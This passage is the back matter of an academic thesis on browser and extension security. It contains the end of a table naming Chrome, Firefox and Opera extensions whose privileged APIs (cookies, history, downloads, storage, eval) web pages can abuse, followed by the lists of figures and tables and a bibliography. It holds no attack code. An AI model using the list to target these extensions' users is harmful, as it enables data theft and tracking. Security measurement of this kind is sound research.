cfddhmlokgokhcmepddjooekhmgmgfld *.ok.ru * host,downloads

efhgmgomhamkkmjbgmcpgjnabcfpnaek *.ok.ru * host,downloads

djhfcchmdelggndcpkgbanfhnpbbijdb *.ok.ru * host,downloads

fhlkioimlijffnblckmdikkadobdmlgn *.apistop.com * host

angncidddapgcmohkdmhidfleomhmfgi logincat.com, * host

lndhlcaobijohmgoikmgpgbhepkbhpkl oneom.tk * host

olpheomfiimdonpboopcailehdagfhaa .g3user.com, * host

idkghekmllmjgnmbohakcddgcclanlca ln.io * host

mhdhcccejcjfanablmohbpdbepdkokkj *.gvt.com.br, * host

plfffminkgohddbooidppccppgelajfp mp.weixin.qq.com, * host

cboekbiaoabkhgjdclenjpipclabkdga *.apiary.io, * host

ekeefjfdbaakgbfbagacmckiedkmakem *.salesmate.io, mail.google.com, host

PUT(0,-845.90042)

202 APPENDIX A. APPENDIX

Table A.7 – Chrome, Firefox and Opera extensions that can be exploited by web applications access privileged APIs and sensitive user

information

Extension unique identifier or name Web applications

to send messages

from

Target web

applications to

access

Permissions (accessible privileged API)

Chrome Browser

lbjbbkhljiimahdeknpckaoiinopofhl *.appspot.com mail.google.com, host

ijmbknjhacbaeeoamjajoolgjgdbpkko *.aliexpress.com, *.google.com, host

hihakjfhbmlmjdnnhegiciffjplmdhin mail.google.com linkedin.com, host

cfbodcmobhpfbjhbennacnanbmpbcfkd *.aliexpress.com, appfreaker.com host

ommfijfafanajffiijecdlfjlbgpmgpl *.treesnetwork.com, docs.google.com, host

okgfglgogpkomipfflpajohdkaflndoh ouramazinghome.comwww.google.com host

iiabjaofopjooifoclbpdmffjlgbplod blog.renren.com *.github.com host

mcdjehgaflnlmilhefigdkldfdnembhk *.spotsetter.com *.amazonaws.comhost

lfekjajdgncmkajdpiadkkhhpblngnlc sub.watch, zooqle.com, host

gkfpnohhmkonpkkpdbebccbgnajfgpjp squares.io/fetch, www.nytimes.comhost

pkkbbimilpjmghfhhppamgigileopnkc * * cookies

5 Fabasoft extensions (See Table A.4) * current tab cookies

emiplbkkiabideffmpogkbbogkmofgph * - downloads

17 extensions (See Table A.2) vk.com, - downloads

eadbjnlpeabhbllkljhifinhfelhimha ok.ru - downloads

ngegklmoecgejlbkiieccocmpmpmfhim *.tribecube.com - downloads

iogibhaacmieogkdgebfbjgoofdlcmgb *.shutterstock.com - downloads

ooeealgadmhdnhebkhhbbcmckehpomcj animevost.org - downloads

dnohbnpecjinmdpeikpnmheeepnapfci vtop.vit.ac.in - downloads

PUT(0,-845.90042)

203

Table A.7 – Chrome, Firefox and Opera extensions that can be exploited by web applications access privileged APIs and sensitive user

information

Extension unique identifier or name Web applications

to send messages

from

Target web

applications to

access

Permissions (accessible privileged API)

Chrome Browser

pgmcojeijjhacgkkjaakdafmloncpema repl.it - downloads

hacopcfnbokiahlppemnlneooamldola hypem.com - downloads

bpkphnbpiagbpinglgejckickdgaghjo amer...matrix.com - history

fheihcbdclkdoeadmjfggiamjgkippli .my-lucky-

star.net

-topSites

llelondjpcjljnjihdflhpclcpbiaiba *.msn.com - topSites

6 Atavi Extensions (See Table A.3) atavi.com, - history,bookmarks,topSites

31 HD Wallpapers (See Table A.1) fliptab.io - history,bookmarks,management,storage

pnbfclligibfgdknphcodpbcejnkhffp * - bookmarks

eihbcgffjehfcgafjljohecmadcefoji app.launch.menu - bookmarks

empgohlokhdhhchkenknobacofijiffg app.launch.menu - bookmarks

aefmgkhgcmdljpfijlohmbhkhflmbmfi openoox.com - bookmarks

dhjhphjhpcelebeagllljbfpipdfkhgi .azurewebsites.net - bookmarks

jeabbgpkliknjiacfkfglknajloappkh yeahap.com, - bookmarks

22 Extensions (See Table A.5) * - storage

24 Extensions (See Table A.6) mail.google.com,

...

-storage

Firefox Browser

guretv-ver-tv * * eval,host,storage

PUT(0,-845.90042)

204 APPENDIX A. APPENDIX

Table A.7 – Chrome, Firefox and Opera extensions that can be exploited by web applications access privileged APIs and sensitive user

information

Extension unique identifier or name Web applications

to send messages

from

Target web

applications to

access

Permissions (accessible privileged API)

Chrome Browser

buxenger * * eval,host

bitbucket-server * * host

logincataddon logincat.com, * host

facebook-photo-zoom-easy www.facebook.com * host

facebook-photo-zoom www.facebook.com * host

markanabak-eklentisi *.markanabak.com, *.wipo.int, host

skimdaddy * skimdaddy.com host

the-trees-network *.treesnetwork.com, docs.google.com, host

assina-me * - downloads

liber-capital * - downloads

video-downloader-1 * - downloads

openvost animevost.org - downloads

youtube-video-download-convert *.youtube.com - downloads

openvideo droppages.com - storage

vgis *.vonage.com - storage

Opera Browser

bmjcngclkmgpfbjcmnbidognkoocpllm * * eval,host,storage

jnmcfakfglphcmgokeeoihifcenjjcgg * * eval,host

pmpnemphhmmpkcafgpdjanghiaadfbef *.ok.ru * host

PUT(0,-845.90042)

205

Table A.7 – Chrome, Firefox and Opera extensions that can be exploited by web applications access privileged APIs and sensitive user

information

Extension unique identifier or name Web applications

to send messages

from

Target web

applications to

access

Permissions (accessible privileged API)

Chrome Browser

mpaghnpkgmnikepcgjddhckcedapomkp *.ok.ru, *.vk.com, * host

bcabkcaakkjfdlodkolfagbdejhhkigp *.lazyrobin.ru * host

bidjmocompdljmeglljcoecikgogfjbb sub.watch, zooqle.com, host

aghgmcnoiflhcnfjkckofmjbeinjkena vk.com, - downloads

mhjbdafcpnoapkglmldoofhhbpnogehk vk.com, - downloads

hajlecmoacenahambneialopbpleihjn * - storage

lkdpdiepahdagdknbbjgnadholcdgfib tweetdeck-

enhancer

-storage

PUT(0,-845.90042)

PUT(0,-845.90042)PUT(0,-845.90042)

PUT(0,-845.90042)

List of Figures

2.1 Evolution of CSP adoption among top 10,000 Alexa Sites between April

2016 and April 2018 - Source [153]....................... 37

3.1 An XSS attack despite CSP. ........................... 39

3.2 Data Collection and Analysis Process ...................... 43

3.3 Percentage of pages with CSP per site ..................... 45

3.4 Differences in CSP directives for parent and iframe pages ........... 48

3.5 Differences in CSP directives for same-origin and relaxed origin pages . . . . 49

5.1 Monitoring CSP Enforcement .......................... 87

5.2 Performance overhead of deploying the monitor ................ 94

5.3 Overhead introduced by applying CSP to content ............... 95

6.1 Third Party Tracking ...............................107

6.2 Stateful tracking mechanisms ..........................108

6.3 Privacy-Preserving Web Architecture ......................111

6.4 Preventing trackers from combining in-context and cross-context tracking . 112

6.5 A demo page displaying a Google Maps ....................116

7.1 Results of general fingerprinting algorithm. Testing 485 carefully selected

extensions provides a very similar uniqueness result to testing all 16,743

extensions. Almost unique means that there are 2–5 users with the same

fingerprint. ....................................121

7.2 Detection of browser extensions and Web logins. A user visits a benign

website test.com which embeds third party code (the attacker’ script) from

attacker.com. The script detects an icon of Adblock extension and con-

cludes that Adblock is installed. Then the script detects that the user is

logged into Facebook when it successfully loads Facebook favicon.ico. It

also detects that the user is logged into LinkdedIn through a CSP violation

report triggered because of a redirection from https://fr.linkedin.com

to https://www.linkedin.com. All the detection of extensions and logins

are invisible to the user. .............................122

7.3 Evolution of detected extensions in Chrome ..................125

7.4 Usage of browser extensions and logins by all users. ..............127

7.5 Distribution of anonymity set sizes for 16,393 users based on detected ex-

tensions and logins. ................................128

7.6 Four final datasets. DExt contains users, who have installed at least one

detected extension and DLog contains users, who have at least one login

detected. ......................................129

207

PUT(0,-845.90042)

208 LIST OF FIGURES

7.7 Anonymity sets for different datasets ......................130

7.8 Anonymity sets for users with respect to the number of detected extensions 130

7.9 Anonymity sets when JavaScript is disabled ..................131

7.10 Comparison of fingerprint pattern size (targeted) and the total number of

detected attributes (detected) for unique users. ................133

7.11 Anonymity sets for different numbers of attributes tested by general finger-

printing algorithm. ................................134

7.12 Uniqueness of users vs. number of unblocked third-party cookies ......136

7.13 Uniqueness of Chrome users based on their extensions only vs. number of

users - 204 is the number of users used in [245] and 854 the number of users

considered in [260]................................138

8.1 Browser extensions architecture - Communications with web applications . . 149

8.2 Methodology - static and manual analysis ...................152

8.3 Distribution of the number of users per extension ...............156

8.4 A.com forces an attack by opening B.com thereby allowing A.com/content

to load, execute and interact with extensions in order to exfiltrate user data

to A.com......................................166

9.1 CORS requests workflow in presence of an extension with the capability to

intercept and manipulate HTTP headers ....................171

9.2 CORS request blocked with CORSER deactivated ................176

9.3 CORSER allows CORS requests ..........................176

9.4 CORSER allows CORS requests with credentials .................177

9.5 Distribution of users of extensions with the capability to tamper with CORS

headers ......................................181

9.6 Distribution of users of extensions manipulating CORS headers . . . . . . . 182

9.7 Categories of extensions manipulating CORS headers .............183

9.8 Breaking legitimate CORS requests by adding multiple values to the Access-Control-Allow-Origin

header .......................................185

9.9 Breaking legitimate CORS requests with credentials by changing Access-Control-Allow-Origin

to *.........................................185

PUT(0,-845.90042)

List of Tables

2.1 HTTP headers (excerpt) exchanged between the browser (client) and the

server for an access to https://www.google.com ............... 8

2.2 CORS headers exchanges between web browsers and servers. In many cases,

there is a one-to-one correspondence between the requests and responses

headers. The browser sends a header, and the server uses its dual to autho-

rize or reject cross-origin requests ........................ 18

2.3 Excerpt of CSP directives and their descriptions ................ 23

3.1 Crawling statistics ................................ 45

3.2 Statistics CSP violations due to Same-Origin Policy .............. 46

3.3 Sample of sites with CSP violations due to Same-Origin Policy ....... 46

3.4 Potential CSP violations in pages with CSP .................. 48

4.1 CSP directives by version ............................ 53

4.2 CSP Core Syntax ................................. 60

4.3 Formalization of Dependency-Free Policies (DF-CSP) considering CSP1,

CSP2 and CSP3 versions and their implementations in browsers. ...... 62

4.4 Rewriting Rules .................................. 66

4.5 Dependencies and rewriting rules considering only CSP2 and CSP3 and their

implementations in browsers ........................... 70

4.6 Dependencies and rewriting rules for CSP2 and CSP3, according to the spec-

ifications. We consider only browsers which implementations are compliant

with the specifications .............................. 71

4.7 Dependencies in the wild, considering CSP1, CSP2, CSP3 and their imple-

mentations in browsers. ............................. 72

5.1 Matching arguments in an origin against arguments in a URL ........ 89

6.1 Third party content and execution context ...................108

6.2 Injecting dynamic third party content .....................112

7.1 Users filtered out of the final dataset ......................124

7.2 Previous studies on measuring uniqueness based on browser extensions and

our estimation of uniqueness. ..........................125

7.3 Normalized entropy of extensions and logins compared to previous studies. . 126

7.4 Top seven most popular extensions in our dataset and their popularity on

Chrome Web Store ................................127

7.5 Top seven most popular logins in our dataset and their ranking according

to Alexa ......................................128

209

PUT(0,-845.90042)

210 LIST OF TABLES

8.1 Data overview ...................................155

8.2 Category of extensions ..............................156

9.1 Data collection and analysis results overview ..................179

9.2 Most requested permissions among Chrome, Firefox and Opera extensions . 179

9.3 Top 3 most popular categories among extensions with the ability to manip-

ulate HTTP headers ...............................180

9.4 Sources (origins of webpages) and targets (web applications servers) of CORS

requests allowed by extensions. The table reads from row to column . . . . 182

9.5 User action to enable extensions .........................182

9.6 Extensions breaking the Same Origin Policy - Types of authorized CORS

requests ......................................184

9.7 Breaking web applications, because of a harsh modification of CORS headers

by extensions. ...................................185

A.1 Extensions with the same code base which gives *.fliptab.io access to brows-

ing history (get/delete), bookmarks (get), extensions (get/enable/disable/unin-

stall) and storage .................................196

A.2 Extensions with the same code base for triggering downloads from vk.com,

*.vimeo.com, *.coub.com, *.kinopoisk.ru ....................197

A.3 Extensions with the same code base which leaks topsites, history and/or

bookmarks to *.atavi.com, *.atavi.test .....................197

A.4 Extensions with the same code base, provided by Fabasoft, which give access

to the current tab cookies ............................197

A.5 Extensions which give access to their storage to any application .......198

A.6 Extensions which give access to their storage to specific applications . . . . 199

A.7 Chrome, Firefox and Opera extensions that can be exploited by web appli-

cations access privileged APIs and sensitive user information .........200

A.7 Chrome, Firefox and Opera extensions that can be exploited by web appli-

cations access privileged APIs and sensitive user information .........201

A.7 Chrome, Firefox and Opera extensions that can be exploited by web appli-

cations access privileged APIs and sensitive user information .........202

A.7 Chrome, Firefox and Opera extensions that can be exploited by web appli-

cations access privileged APIs and sensitive user information .........203

A.7 Chrome, Firefox and Opera extensions that can be exploited by web appli-

cations access privileged APIs and sensitive user information .........204

A.7 Chrome, Firefox and Opera extensions that can be exploited by web appli-

cations access privileged APIs and sensitive user information .........205

PUT(0,-845.90042)

List of tools and websites

[1] A Monitor to Complement Content Security Policy (CSP) Expressiveness. https:

//swexts.000webhostapp.com/monitor/.

[2] Analyze Message Passing APIs in Browser extensions components. https://swexts.

000webhostapp.com/extsanalyzer/.

[3] Building Dependency-Free Content Security Policy (DF-CSP). https://swexts.

000webhostapp.com/dependencies/.

[4] CORSER - Cross-browser extension for tampering with HTTP CORS headers. https:

//github.com/mesolido/corser.

[5] Deploying Server-Side Tracking Protection Architecture. http://www-sop.inria.fr/

members/Doliere.Some/essos/deployment.html.

[6] Webstats - Various statistics about top 10,000 Alexa sites. https://webstats.inria.

fr/.

211

PUT(0,-845.90042)

PUT(0,-845.90042)PUT(0,-845.90042)

PUT(0,-845.90042)

Bibliography

[1] Hypertext Transfer Protocol. https://www.ietf.org/rfc/rfc2616.txt.

[2] Microsoft Edge Extensions API. https://docs.microsoft.com/en-us/

microsoft-edge/extensions.

[3] A comprehensive tutorial on cross-site scripting. https://excess-xss.com/.

[4] Abstract Syntax Tree. http://esprima.readthedocs.io/en/4.0/

syntax-tree-format.html#expressions-and-patterns.

[5] Access-Control-Allow-Origin:* - Chrome Extension. https://

chrome.google.com/webstore/detail/allow-control-allow-origi/

nlfbmbojpeacfghkpbjhddihlkkiljbi.

[6] AdBlock - Block Ads - Browse Safe. https://getadblock.com/.

[7] Adblockplus official website. https://adblockplus.org/.

[8] AngularJS. https://angularjs.org/.

[9] APACHE HTTP SERVER PROJECT. https://httpd.apache.org/.

[10] Application programming interface. https://en.wikipedia.org/wiki/

Application_programming_interface.

[11] ASP.NET Web Framework. https://www.asp.net/.

[12] Asynchronous JavaScript + XML (AJAX). https://developer.mozilla.org/

en-US/docs/Web/Guide/AJAX.

[13] Atavi - bookmark manager. https://chrome.google.com/webstore/detail/

atavi-bookmark-manager/jpchabeoojaflbaajmjhfcfiknckabpo.

[14] Background Page. https://developer.mozilla.org/en-US/docs/Mozilla/

Add-ons/WebExtensions/manifest.json/background.

[15] Boomerang for Gmail - Chrome Extension. https://chrome.google.com/

webstore/detail/boomerang-for-gmail/mdanidgdpmkimeiiojknlnekblgmpdll.

[16] Brave browser. https://brave.com/.

[17] Browser Console. https://developer.mozilla.org/en-US/docs/Tools/Browser_

Console.

[18] Browser History. https://chrome.google.com/webstore/detail/

browser-history/bpkphnbpiagbpinglgejckickdgaghjo.

[19] Browsing Contexts. https://www.w3.org/TR/html51/browsers.html.

[20] Bug 1372288 - webextensions uuid can be used as user fingerprint. https://

bugzilla.mozilla.org/show_bug.cgi?id=1372288.

[21] Can I use Content Security Policy 1.0 (Known issues). https://caniuse.com/

#search=content%20security%20policy.

213

PUT(0,-845.90042)

214 BIBLIOGRAPHY

[22] Cascading Style Sheets. https://www.w3.org/Style/CSS/.

[23] Chrome - Publish in the Chrome Web Store. https://developer.chrome.com/

webstore/publish.

[24] Chrome Extensions. https://chrome.google.com/webstore/category/

extensions?hl=en-US.

[25] Chrome Extensions API. https://developer.chrome.com/extensions.

[26] Chrome Extensions API - Content scripts and Content Security Policy. https:

//developer.chrome.com/extensions/contentSecurityPolicy.

[27] Chrome Platform Status. https://www.chromestatus.com/metrics/feature/

popularity#DocumentSetDomain.

[28] Chrome WebRequest API. https://developer.chrome.com/extensions/

webRequest.

[29] CLIQZ. https://cliqz.com.

[30] CloudExtend Gmail for NetSuite - Chrome Extension. https:

//chrome.google.com/webstore/detail/cloudextend-gmail-for-net/

fbaloimemjelmonlpfnmiipkeldlnnbl.

[31] Content Security Policy - Firefox Extensions. https://developer.mozilla.org/

en-US/docs/Mozilla/Add-ons/WebExtensions/Content_Security_Policy.

[32] Content Security Policy (CSP) - Chrome Extensions. https://developer.chrome.

com/extensions/contentSecurityPolicy.

[33] CORS - Mozilla Developer Network. https://developer.mozilla.org/fr/docs/

Web/HTTP/CORS.

[34] CORS protocol - Fetch Specification. https://fetch.spec.whatwg.org/

#http-cors-protocol.

[35] CORS Toggle - Opera Extension. https://addons.opera.com/en/extensions/

details/cors-toggle/.

[36] CORSER extension on Chrome. https://chrome.google.com/webstore/detail/

corser/elgclnafddmkhhnhlfgfahgbahkginga.

[37] CORSER extension on Firefox. https://addons.mozilla.org/en-US/firefox/

addon/corser-addon/.

[38] CORSER extension on Opera. https://addons.opera.com/en/extensions/

details/corser-authorize-cors-requests/.

[39] Cross-Origin Communications. https://developer.mozilla.org/en-US/docs/

Web/API/Window/postMessage.

[40] Cross-origin-resource sharing. https://developer.mozilla.org/en-US/docs/Web/

HTTP/Access_control_CORS.

[41] Cross-Site-Scripting. https://www.owasp.org/index.php/Cross\protect\

discretionary{\char\hyphenchar\font}{}{}site_Scripting_(XSS).

[42] CSP violations online. https://webstats.inria.fr?cspviolations.

[43] CSS Font Loading API. https://developer.mozilla.org/en-US/docs/Web/API/

CSS_Font_Loading_API.

[44] CSS Parser for Node.js. https://github.com/reworkcss/css.

[45] Data URI scheme. https://en.wikipedia.org/wiki/Data_URI_scheme.

PUT(0,-845.90042)

215

[46] Disable CORS - Chrome Extension. https://chrome.google.com/webstore/

detail/disable-cors/mghlhnfeimllfjdpacagfdmchnhbgfeh.

[47] Disconnect. https://disconnect.me/.

[48] Document Object Model (DOM). https://developer.mozilla.org/en-US/docs/

Web/API/Document_Object_Model.

[49] Document.cookie. https://developer.mozilla.org/en-US/docs/Web/API/

Document/cookie.

[50] ECMAScript R

2017 Internationalization API Specification (ECMA-402, 4th Edi-

tion, June 2017). https://www.ecma-international.org/ecma-402/4.0/.

[51] eEail.in Chrome extension. https://chrome.google.com/webstore/detail/

erailin/aopfgjfeiimeioiajeknfidlljpoebgc.

[52] Extensions and the add-on ID. https://developer.mozilla.org/en-US/docs/

Mozilla/Add-ons/WebExtensions/WebExtensions_and_the_Add-on_ID.

[53] Faceboook website. https://www.facebook.com/.

[54] Fetch Specification. https://fetch.spec.whatwg.org/.

[55] Fetch Specification. https://fetch.spec.whatwg.org/.

[56] Firefox - Submitting an add-on. https://developer.mozilla.org/en-US/docs/

Mozilla/Add-ons/Distribution/Submitting_an_add-on.

[57] Firefox - Web Accessible Resources. https://developer.mozilla.org/en-US/

docs/Mozilla/Add-ons/WebExtensions/manifest.json/web_accessible_

resources.

[58] Firefox Add-ons. https://addons.mozilla.org/en-US/firefox/.

[59] Firefox WebRequest API. https://developer.mozilla.org/en-US/docs/

Mozilla/Add-ons/WebExtensions/API/webRequest.

[60] Firefox webRequest.onBeforeSendHeaders. https://developer.mozilla.

org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/webRequest/

onBeforeSendHeaders.

[61] Ghostery. https://www.ghostery.com/.

[62] Google Chrome browser. https://www.google.com/chrome/.

[63] Google. Manifest - Web Accessible Resources. https://developer.chrome.com/

extensions/manifest/web_accessible_resources.

[64] Google. Manifest File Format. https://developer.chrome.com/extensions/

manifest.

[65] Google website. https://www.google.com/.

[66] Google’s Gmail. https://gmail.com.

[67] GureTV: To watch television - Firefox Extension. https://addons.mozilla.org/

en-US/firefox/addon/guretv-ver-tv/.

[68] HD Wallpapers from fliptab.io. http://www.fliptab.io/.

[69] HTML Parser for Node.js. https://github.com/tmpvar/jsdom.

[70] HTML Standard. https://html.spec.whatwg.org/.

[71] HTML5 Specification - W3C. https://www.w3.org/TR/html5/forms.html.

[72] HTTP Commander - Chrome Extension. https://chrome.google.com/webstore/

detail/http-commander/emiplbkkiabideffmpogkbbogkmofgph.

PUT(0,-845.90042)

216 BIBLIOGRAPHY

[73] HTTP Cookies. https://developer.mozilla.org/en-US/docs/Web/HTTP/

Cookies.

[74] Http cookies. https://developer.mozilla.org/fr/docs/HTTP/Cookies.

[75] HTTPS. https://en.wikipedia.org/wiki/HTTPS.

[76] Iframe Sandbox Attribute. https://www.w3.org/TR/2011/WD-html5-20110525/

the-iframe-element.html#attr-iframe-sandbox.

[77] ISOGG Y-Tree AddOn - Chrome Extension. https://chrome.google.com/

webstore/detail/isogg-y-tree-addon/cfnjeahambijfdljfacldifapdcklhnj.

[78] Iwassa - Chrome Extension. https://chrome.google.com/webstore/detail/

iwassa/hnkmipajjgbclkombnmigfnpekddlhlh.

[79] IWASSA - Opera Extension. https://addons.opera.com/en/search/?query=

bmjcngclkmgpfbjcmnbidognkoocpllm.

[80] Javascript - mozilla developer network. https://developer.mozilla.org/bm/docs/

Web/JavaScript.

[81] JavaScript Object Property Access - Dot and Array Notation. https:

//developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/

Property_Accessors.

[82] JavaScript Proxy. https://developer.mozilla.org/en-US/docs/Web/

JavaScript/Reference/Global_Objects/Proxy.

[83] JavaScript scope. https://developer.mozilla.org/en-US/docs/Glossary/Scope.

[84] jianlibao - Chrome Extension. https://chrome.google.com/webstore/detail/

jianlibao/fimckmjeammfdcpldmcigeojkkmeeian.

[85] jQuery. http://jquery.com/.

[86] Lastpass official website. https://www.lastpass.com/business.

[87] LinkClicker - Chrome Extension. https://chrome.google.com/webstore/detail/

linkclicker/hoobpdoclliidciecjifpikpnopjpmkh.

[88] LinkClicker - Opera Extension. https://addons.opera.com/en/search/?query=

jnmcfakfglphcmgokeeoihifcenjjcgg.

[89] LinkedIn Sales Navigator - Chrome Extension. https://

chrome.google.com/webstore/detail/linkedin-sales-navigator/

hihakjfhbmlmjdnnhegiciffjplmdhin.

[90] Linkedin website. https://www.linkedin.com/.

[91] Man-in-the-middle attack. https://en.wikipedia.org/wiki/

Man-in-the-middle_attack.

[92] MegaTest - Opera Extension. https://addons.opera.com/en/extensions/

details/megatest-uznat-rezultat/.

[93] Message Passing - Google Chrome Extensions. https://developer.chrome.com/

extensions/messaging.

[94] Microsoft Edge Extensions. https://www.microsoft.com/en-us/store/

collections/edgeextensions/pc.

[95] Microsoft Internet Information Services (IIS). https://www.iis.net/.

[96] MIME types. https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_

of_HTTP/MIME_types.

PUT(0,-845.90042)

217

[97] ModernDeck - Chrome Extension. https://chrome.google.com/webstore/detail/

moderndeck/pbpfgdgddpnbjcbpofmdanfbbigocklj.

[98] ModernDeck - Opera Extension. https://addons.opera.com/en/search/?query=

lkdpdiepahdagdknbbjgnadholcdgfib.

[99] MongoDB. https://www.mongodb.com/.

[100] Mozilla WebExtensions API. https://developer.mozilla.org/en-US/Add-ons/

WebExtensions.

[101] multiDownloader - Chrome Extension. https://chrome.google.com/webstore/

detail/multidownloader/dnohbnpecjinmdpeikpnmheeepnapfci.

[102] MutationObserver API . https://developer.mozilla.org/en-US/docs/Web/API/

MutationObserver.

[103] MySQL Database. https://www.mysql.com/.

[104] NGINX. https://www.nginx.com/.

[105] Node.js. https://nodejs.org/en/.

[106] Node.js Proxy. https://newspaint.wordpress.com/2012/11/05/

node-js-http-and-https-proxy.

[107] Opera - Passing Messages in Extensions. https://dev.opera.com/extensions/

message-passing/.

[108] Opera Add-ons. https://addons.opera.com/en/extensions/.

[109] Opera browser. http://www.opera.com/.

[110] Opera Extensions API. https://dev.opera.com/extensions/.

[111] Oracle Database. https://www.oracle.com/index.html.

[112] Phishing Attack. https://en.wikipedia.org/wiki/Phishing.

[113] PHP: Hypertext Preprocessor. http://php.net/.

[114] PhyloTreeMT AddOn - Chrome Extension. https://chrome.google.com/

webstore/detail/phylotreemt-addon/ilpkhojfiejdbkgcjbmllngjebdoehim.

[115] PostgreSQL Database. https://www.postgresql.org/.

[116] PostMessage - Cross-Origin Iframe Secure Communication. https://developer.

mozilla.org/en-US/docs/Web/API/Window/postMessage.

[117] Privacy Badger. https://www.eff.org/fr/privacybadger.

[118] Publishing Guidelines - Opera Extensions. https://dev.opera.com/extensions/

publishing-guidelines/.

[119] Python Programming Language. https://www.python.org/.

[120] renren-markdown - Chrome Extension. https://chrome.google.com/webstore/

detail/renren-markdown/iiabjaofopjooifoclbpdmffjlgbplod.

[121] repl.it download - Chrome Extension. https://chrome.google.com/webstore/

detail/replit-download/pgmcojeijjhacgkkjaakdafmloncpema.

[122] Reverse Proxy. https://en.wikipedia.org/wiki/Reverse_proxy.

[123] Ringostat dialer. https://chrome.google.com/webstore/detail/

ringostat-dialer/pfofjhnkanlacmgfgjohncmgemffkldl.

[124] SalesforceIQ CRM. https://chrome.google.com/webstore/detail/

salesforceiq-crm/jpcebpeheognnbogfkpllmmdnimjffdb.

PUT(0,-845.90042)

218 BIBLIOGRAPHY

[125] Same Origin Policy. https://developer.mozilla.org/en-US/docs/Web/

Security/Same-origin_policy.

[126] Secure Hash Algorithms. https://en.wikipedia.org/wiki/Secure_Hash_

Algorithms.

[127] Server Side Access Control (CORS). https://developer.mozilla.org/en-US/

docs/Web/HTTP/Server-Side_Access_Control.

[128] Service Worker API. https://developer.mozilla.org/en-US/docs/Web/API/

Service_Worker_API.

[129] Session Hijacking Attack. https://www.owasp.org/index.php/Session_

hijacking_attack.

[130] SlimerJS - A scriptable browser for Web developers. https://slimerjs.org/.

[131] Space Galaxy HD Wallpapers - Chrome Extension. https://

chrome.google.com/webstore/detail/space-galaxy-hd-wallpaper/

dkpndikhfepllbpaafgcelembimabofo.

[132] StartHQ. https://chrome.google.com/webstore/detail/starthq/

ilcpdgfepihaomggobhmfiimflngbcoh.

[133] Telerik Test Studio Chrome Playback 2014.1. https://

chrome.google.com/webstore/detail/telerik-test-studio-chrom/

pkkbbimilpjmghfhhppamgigileopnkc.

[134] The Basics of Browser Helper Objects. https://blogs.msdn.microsoft.com/

askie/2007/12/07/the-basics-of-browser-helper-objects/.

[135] The OWASP Top Ten Project. https://www.owasp.org/index.php/Top_10_

2013-Top_10.

[136] Tor Browser. https://www.torproject.org/projects/torbrowser/design/.

[137] Tracking Compliance and Scope. https://www.w3.org/TR/tracking-compliance/.

[138] Tracking Preference Expression. https://www.w3.org/TR/tracking-dnt/.

[139] uBlock Origin. https://www.ublock.org/.

[140] uBlock Origin - Chrome Extension. https://chrome.google.com/webstore/

detail/ublock-origin/cjpalhdlnbpafiamejdnhcphjbkeiagm?hl=en-US.

[141] uBlock Origin - Firefox Extension. https://addons.mozilla.org/en-US/firefox/

addon/ublock-origin/?src=search.

[142] uBlock Origin - Opera Extension. https://addons.opera.com/en/search/?query=

kccohkcpppjjkkjppopfnflnebibpida.

[143] URI - Uniform Resource Identifier. https://en.wikipedia.org/wiki/Uniform_

Resource_Identifier.

[144] URL. https://www.w3.org/TR/url.

[145] URLSearchParams API. https://developer.mozilla.org/en-US/docs/Web/API/

URLSearchParams.

[146] User-Agent Switcher - Firefox Extensions. https://addons.mozilla.org/en-US/

firefox/addon/user-agent-switcher-revived/.

[147] User-Agent Switcher for Chrome - Chrome Extension. https:

//chrome.google.com/webstore/detail/user-agent-switcher-for-c/

djflhoibgkdhkhhcedjiklpkjnoahfmg.

PUT(0,-845.90042)

219

[148] Using CORS - HTML5 Rocks. https://www.html5rocks.com/en/tutorials/

cors/.

[149] Using Service Workers. https://developer.mozilla.org/en-US/docs/Web/API/

Service_Worker_API/Using_Service_Workers.

[150] Using Web Workers. https://developer.mozilla.org/en-US/docs/Web/API/Web_

Workers_API/Using_web_workers.

[151] VisualSP Training for Office 365 - Chrome Extension. https:

//chrome.google.com/webstore/detail/visualsp-training-for-off/

ohdihpdgfenligmhnmldmiabdhflokkh.

[152] WebExtensions web_accessible_resources. https://developer.mozilla.org/

en-US/Add-ons/WebExtensions/manifest.json/web_accessible_resources.

[153] Webstats - Various statistics about top 10,000 Alexa sites. https://webstats.

inria.fr/.

[154] Window . https://developer.mozilla.org/en-US/docs/Web/API/Window.

[155] XMLHttpRequest. https://developer.mozilla.org/en-US/docs/Web/API/

XMLHttpRequest.

[156] XPCOM Interfaces. https://developer.mozilla.org/en-US/docs/Mozilla/

Tech/XUL/Tutorial/XPCOM_Interfaces.

[157] Youtube website. https://www.youtube.com/.

[158] ZenMate VPN - Best Cyber Security & Unblock - Chrome Extension.

https://chrome.google.com/webstore/detail/zenmate-vpn-best-cyber-se/

fdcgdnkidjaadafnichfpabhfomcebme.

[159] ZenMate VPN - Opera Extension. https://addons.opera.com/en/search/?query=

cnhbkkedmelfmalgjpkngiaoifpdfcnl.

[160] ZenMate VPN for Firefox - Firefox Extension. https://addons.mozilla.org/

en-US/firefox/addon/zenmate-vpn/.

[161] European Commision Law on Cookies, 2012. http://ec.europa.eu/ipg/basics/

legal/cookies/index_en.htm.

[162] Webstats - Use of Content Security Policy and Cookies in top 10,000 Alexa sites,

2016. https://webstats.inria.fr/popsecurity.php.

[163] Erwan Abgrall, Yves Le Traon, Martin Monperrus, Sylvain Gombault, Mario Hei-

derich, and Alain Ribault. XSS-FP: browser fingerprinting using HTML parser

quirks. CoRR, 2012.

[164] Gunes Acar, Christian Eubank, Steven Englehardt, Marc Juárez, Arvind Narayanan,

and Claudia Díaz. The web never forgets: Persistent tracking mechanisms in the wild.

In Proc. of CCS 2014.

[165] Gunes Acar, Marc Juárez, Nick Nikiforakis, Claudia Díaz, Seda F. Gürses, Frank

Piessens, and Bart Preneel. FPDetective: dusting the web for fingerprinters. In

Proc. of CCS 2013.

[166] Jagdish Prasad Achara, Gergely Ács, and Claude Castelluccia. On the unicity of

smartphone applications. CoRR, abs/1507.07851, 2015.

[167] Jagdish Prasad Achara, Javier Parra-Arnau, and Claude Castelluccia. Mytracking-

choices: Pacifying the ad-block war by enforcing user privacy preferences. CoRR,

2016.

PUT(0,-845.90042)

220 BIBLIOGRAPHY

[168] Steven Van Acker, Daniel Hausknecht, and Andrei Sabelfeld. Data Exfiltration in

the Face of CSP. In Xiaofeng Chen, XiaoFeng Wang, and Xinyi Huang, editors,

Proceedings of the 11th ACM on Asia Conference on Computer and Communications

Security, AsiaCCS 2016, Xi’an, China, May 30 - June 3, 2016, pages 853–864. ACM,

2016.

